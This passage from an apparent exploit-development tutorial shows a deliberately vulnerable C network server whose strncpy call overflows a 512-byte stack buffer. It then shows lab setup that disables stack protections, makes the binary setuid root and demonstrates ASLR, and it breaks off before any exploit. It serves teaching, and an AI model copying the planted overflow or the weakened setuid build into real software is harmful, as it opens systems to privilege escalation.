class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"5/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendtoken/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"TFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"TFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="n"CNUM/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"5/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main difference here is that the input is converted to a number and if that number is equal to code58623/code, the contents of a different file (codetoken/code) is sent to the client./p h3The Fix/h3 pThe fix is the same as in part 3. The vulnerable code is the call to strncpy on line 102./p h2Setting Up The Environment/h2 pThe environment is going to be exactly the same as in part 3, except we have a new file and ASLR will be enabled./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"root@dev:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat secret.txt /span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="s2"quot;084934-3492048234728-4847847quot;/span gt; token/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l token /span span class="code-line"span class="go"-rw-r--r-- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span token /span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat token /span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"appuser@dev:~$ /spanls -l/span span class="code-line"span class="go"total 20/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat token/span span class="code-line"span class="go"cat: token: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pThe big difference here is that we did not change the content of the file code/proc/sys/kernel/randomize_va_space/code, if the value of this wasn't 2, then run the following command to change it: codeecho 2 gt; /proc/sys/kernel/randomize_va_space/code/p pThis means that ASLR will be enabled. We can prove this by looking at the memory map of a process over multiple executions:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"0838a000-083ab000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74e9000-b7528000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b7528000-b7646000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b7646000-b7647000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b7647000-b77a4000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a4000-b77a5000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a5000-b77a7000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a7000-b77a8000 rw-p 0015f000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b77a8000-b77ab000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77b7000-b77b8000 r--p 00000000 08:01 961741 /usr/lib/locale/gez_ET@abegede/LC_NUMERIC/span/span span class="code-line"span class="go"b77b8000-b77b9000 r--p 00000000 08:01 962466 /usr/lib/locale/en_ZM/LC_TIME/span/span span class="code-line"span class="go"b77b9000-b77ba000 r--p 00000000 08:01 962019 /usr/lib/locale/gv_GB.utf8/LC_MONETARY/span/span span class="code-line"span class="go"b77ba000-b77bb000 r--p 00000000 08:01 1071064 /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES/span/span span class="code-line"span class="go"b77bb000-b77bc000 r--p 00000000 08:01 1065713 /usr/lib/locale/sr_RS/LC_PAPER/span/span span class="code-line"span class="go"b77bc000-b77bd000 r--p 00000000 08:01 962122 /usr/lib/locale/cy_GB.utf8/LC_NAME/span/span span class="code-line"span class="go"b77bd000-b77be000 r--p 00000000 08:01 962015 /usr/lib/locale/gv_GB.utf8/LC_ADDRESS/span/span span class="code-line"span class="go"b77be000-b77bf000 r--p 00000000 08:01 962121 /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE/span/span span class="code-line"span class="go"b77bf000-b77c0000 r--p 00000000 08:01 1066122 /usr/lib/locale/sr_RS/LC_MEASUREMENT/span/span span class="code-line"span class="go"b77c0000-b77c7000 r--s 00000000 08:01 827509 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache/span/span span class="code-line"span class="go"b77c7000-b77c8000 r--p 00000000 08:01 963555 /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION/span/span span class="code-line"span class="go"b77c8000-b77ca000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b77ca000-b77cb000 r-xp 00000000 00:00 0 [vdso]/span/span span class="code-line"span class="go"b77cb000-b77e7000 r-xp 00000000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e7000-b77e8000 r--p 0001b000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"b77e8000-b77e9000 rw-p 0001c000 08:01 1062553 /lib/i386-linux-gnu/ld-2.13.so/span/span span class="code-line"span class="go"bfa32000-bfa53000 rw-p 00000000 00:00 0 [stack]/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 r--p 0000b000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08055000-08056000 rw-p 0000c000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08dd9000-08dfa000 rw-p 00000000 00:00 0 [heap]/span/span span class="code-line"span class="go"b74de000-b751d000 r--p 00000000 08:01 1066328 /usr/lib/locale/pap_AN/LC_CTYPE/span/span span class="code-line"span class="go"b751d000-b763b000 r--p 00000000 08:01 1066368 /usr/lib/locale/pap_AN/LC_COLLATE/span/span span class="code-line"span class="go"b763b000-b763c000 rw-p 00000000 00:00 0 /span/span span class="code-line"span class="go"b763c000-b7799000 r-xp 00000000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b7799000-b779a000 ---p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779a000-b779c000 r--p 0015d000 08:01 1045302 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so/span/span span class="code-line"span class="go"b779c000-b779d000 rw-p 